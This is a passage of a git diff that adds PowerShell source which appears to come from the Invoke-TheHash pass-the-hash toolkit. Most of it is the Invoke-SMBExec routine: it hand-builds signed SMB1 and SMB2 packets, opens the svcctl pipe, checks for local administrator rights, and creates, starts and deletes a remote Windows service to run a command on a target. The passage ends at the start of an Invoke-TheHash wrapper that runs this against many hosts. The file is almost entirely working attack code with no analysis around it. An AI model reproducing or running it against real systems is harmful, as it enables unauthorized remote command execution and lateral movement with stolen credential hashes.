$SCM_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + } + + 'CloseRequest' + { + $packet_SMB_header = Get-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBCloseRequest 0x00,0x40 + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'TreeDisconnect' + } + + 'TreeDisconnect' + { + $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBTreeDisconnectRequest + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'Logoff' + } + + 'Logoff' + { + $packet_SMB_header = Get-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBLogoffAndXRequest + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'Exit' + } + + } + + if($SMBExec_failed) + { + BREAK SMB_execute_loop + } + + } + + } + else + { + + $SMB_client_stage = 'TreeConnect' + + :SMB_execute_loop while ($SMB_client_stage -ne 'exit') + { + + switch ($SMB_client_stage) + { + + 'TreeConnect' + { + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2TreeConnectRequest $SMB_path_bytes + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'CreateRequest' + } + + 'CreateRequest' + { + $SMB2_tree_ID = 0x01,0x00,0x00,0x00 + $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes + $packet_SMB2_data["SMB2CreateRequestFile_Share_Access"] = 0x07,0x00,0x00,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'RPCBind' + } + + 'RPCBind' + { + $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl + $SMB_file_ID = $SMB_client_receive[132..147] + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID + $packet_SMB2_data["SMB2WriteRequest_Length"] = 0x48,0x00,0x00,0x00 + $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB2_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadRequest' + $SMB_client_stage_next = 'OpenSCManagerW' + } + + 'ReadRequest' + { + + Start-Sleep -m $Sleep + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header["SMB2Header_CreditCharge"] = 0x10,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2ReadRequest $SMB_file_ID + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + + if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00') + { + $SMB_client_stage = $SMB_client_stage_next + } + else + { + $SMB_client_stage = 'StatusPending' + } + + } + + 'StatusPending' + { + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + + if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00') + { + $SMB_client_stage = $SMB_client_stage_next + } + + } + + 'OpenSCManagerW' + { + $SMB2_message_ID = 30 + $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadRequest' + $SMB_client_stage_next = 'CheckAccess' + } + + 'CheckAccess' + { + + if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') + { + + $SMB_service_manager_context_handle = $SMB_client_receive[108..127] + + if($SMB_execute -eq $true) + { + Write-Verbose "$output_username is a local administrator on $Target" + $SMB_client_stage = 'CreateServiceW' + } + else + { + Write-Output "$output_username is a local administrator on $Target" + $SMB2_message_ID += 20 + $SMB_close_service_handle_stage = 2 + $SMB_client_stage = 'CloseServiceHandle' + } + + } + elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00') + { + Write-Output "$output_username is not a local administrator on $Target" + $SMBExec_failed = $true + } + else + { + Write-Output "Something went wrong with $Target" + $SMBExec_failed = $true + } + + } + + 'CreateServiceW' + { + $SMB2_message_ID += 20 + $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadRequest' + $SMB_client_stage_next = 'StartServiceW' + } + + 'StartServiceW' + { + + if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00') + { + Write-Verbose "Service $SMB_service created on $Target" + $SMB_service_context_handle = $SMB_client_receive[112..131] + $SMB2_message_ID += 20 + $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x13,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + Write-Verbose "Trying to execute command on $Target" + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadRequest' + $SMB_client_stage_next = 'DeleteServiceW' + } + else + { + Write-Output "Service creation fault context mismatch" + $SMBExec_failed = $true + } + + } + + 'DeleteServiceW' + { + + if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00') + { + Write-Output "Command executed with service $SMB_service on $Target" + } + elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00') + { + Write-Output "Service $SMB_service failed to start on $Target" + } + + $SMB2_message_ID += 20 + $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x02,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadRequest' + $SMB_client_stage_next = 'CloseServiceHandle' + $SMB_close_service_handle_stage = 1 + } + + 'CloseServiceHandle' + { + + if($SMB_close_service_handle_stage -eq 1) + { + Write-Verbose "Service $SMB_service deleted on $Target" + $SMB2_message_ID += 20 + $SMB_close_service_handle_stage++ + $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle + } + else + { + $SMB2_message_ID += 1 + $SMB_client_stage = 'CloseRequest' + $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle + } + + $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x00,0x00 + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + } + + 'CloseRequest' + { + $SMB2_message_ID += 20 + $packet_SMB2_header = Get-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2CloseRequest $SMB_file_ID + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'TreeDisconnect' + } + + 'TreeDisconnect' + { + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2TreeDisconnectRequest + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'Logoff' + } + + 'Logoff' + { + $SMB2_message_ID += 20 + $packet_SMB2_header = Get-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 + + if($SMB_signing) + { + $packet_SMB2_header["SMB2Header_Flags"] = 0x08,0x00,0x00,0x00 + } + + $packet_SMB2_data = Get-PacketSMB2SessionLogoffRequest + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB2_sign = $SMB2_header + $SMB2_data + $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) + $SMB2_signature = $SMB2_signature[0..15] + $packet_SMB2_header["SMB2Header_Signature"] = $SMB2_signature + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'Exit' + } + + } + + if($SMBExec_failed) + { + BREAK SMB_execute_loop + } + + } + + } + + } + + $SMB_client.Close() + $SMB_client_stream.Close() +} + +}
\ No newline at end of file diff --git a/Invoke-TheHash.ps1 b/Invoke-TheHash.ps1 new file mode 100644 index 0000000..3a552b4 --- /dev/null +++ b/Invoke-TheHash.ps1 @@ -0,0 +1,243 @@ +function Invoke-TheHash +{ +<# +.SYNOPSIS +Invoke-TheHash has the ability to target multiple hosts with Invoke-SMBExec or Invoke-WMIExec. This function is +primarily for checking a hash against multiple systems. The function can also be used to execute commands +on multiple systems. Note that in most cases it's advisable to just open a single shell and then use other tools +from within that session. + +.PARAMETER Type +Sets the desired Invoke-TheHash function. Set to either WMIExec or SMBExec. + +.PARAMETER Targets +List of hostnames, IP addresses, or CIDR notation for targets. + +.PARAMETER TargetsExclude +List of hostnames and/or IP addresses to exclude form the list or targets. Note that the format +(hostname vs IP address) must match the format used with the Targets parameter. For example, if the host was added +to Targets within a CIDR notation, it must be excluded as an IP address. + +.PARAMETER PortCheckDisable +(Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up +the function by checking for an open 